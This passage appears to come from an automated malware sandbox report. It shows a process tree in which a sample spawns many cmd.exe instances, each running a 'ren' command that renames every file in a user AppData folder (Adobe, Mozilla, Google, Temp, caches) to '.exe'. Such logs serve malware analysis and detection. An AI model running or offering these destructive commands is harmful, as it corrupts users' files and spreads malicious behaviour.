            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6208 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5548 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6572 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 576 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3348 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2296 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7948 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6816 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2696 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6512 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6536 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6148 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1896 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3772 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5804 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7852 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7280 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3552 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2884 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1600 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6752 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5432 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1812 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3748 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4432 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7732 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2272 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5644 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7280 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7964 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6648 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1852 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2412 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3012 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3948 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7016 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1100 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3292 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6148 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
